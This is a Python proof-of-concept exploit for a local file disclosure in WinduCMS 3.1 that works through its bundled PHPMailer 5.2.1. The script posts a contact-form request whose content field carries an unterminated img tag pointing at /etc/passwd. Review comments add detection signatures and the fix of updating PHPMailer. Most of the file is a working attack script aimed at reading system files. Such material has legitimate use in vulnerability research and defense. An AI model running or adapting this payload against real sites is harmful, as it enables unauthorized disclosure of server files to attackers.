#!/usr/bin/python
#
# Exploit Title: WinduCMS <= 3.1 - Local File Disclosure
# Date: 2017-12-03
# Exploit Author: Maciek Krupa
# Vendor Homepage: http://windu.org
# Version: 3.1
# Tested on: Linux Debian 9
#
# // Description //
#
# Local File Disclosure vulnerability exists in WinduCMS through a vulnerable PHPMailer version 5.2.1 used here
#
# // PoC //
#
# It requires a contact form present on the website
#
# Example: {{W name=contactForm inputs="name" email="root@localhost"}}
#
# NOTE(review): the description above attributes the root cause to the
# bundled PHPMailer 5.2.1 rather than to WinduCMS's own code, so the
# relevant fix on the defending side is updating that PHPMailer component
# (confirm the fixed version against the PHPMailer advisory); removing the
# contact form only removes the reachable entry point used here.

"""Proof-of-concept request for the WinduCMS contact-form issue described above.

The script sends exactly one multipart/form-data POST to a hard-coded
localhost URL and reports "Exploited." purely on the HTTP status code;
the response body is never read or printed.

Detection notes (every value below is fixed in the script, so the request
has a constant signature):
  * POST to a contact page with ``mn=contactform.message.negative`` in the query string
  * multipart boundary ``----WebKitFormBoundary1500777958139315``
  * User-Agent claiming Firefox 45 on Windows NT 6.1
  * a ``content`` form field beginning with ``<img src="`` followed by a filesystem path
"""

from requests_toolbelt import MultipartEncoder  # third-party; builds the multipart body
import requests

print("WinduCMS <= 3.1 Exploit")

# Target URL is hard-coded to localhost; the role of the ``mn`` query value is
# not explained by the author (presumably selects a contact-form handler branch).
url = 'http://localhost/contact_page?mn=contactform.message.negative'
email = 'attacker@example.com'
# The ``content`` field carries an unterminated <img> tag whose src is a local
# path; the header comment attributes the resulting file read to PHPMailer 5.2.1.
payload = '<img src="/etc/passwd"'
# Name of the text input declared by the {{W name=contactForm inputs=...}} tag.
form_input = 'name'
fields = {'form_key': 'contactForm', form_input: 'Attacker', 'email': email, 'content': payload}
# A fixed boundary (instead of a randomly generated one) keeps the request
# byte-identical across runs.
m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundary1500777958139315')
headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 'Content-Type': m.content_type}
print('Sending payload to target...')
# No timeout is passed, so this call can block indefinitely on an unresponsive host.
r = requests.post(url, data=m.to_string(), headers=headers)
# Success is inferred from the status code alone; any disclosed content in the
# response body is neither checked nor shown.
if r.status_code == 200:
    print('Exploited.')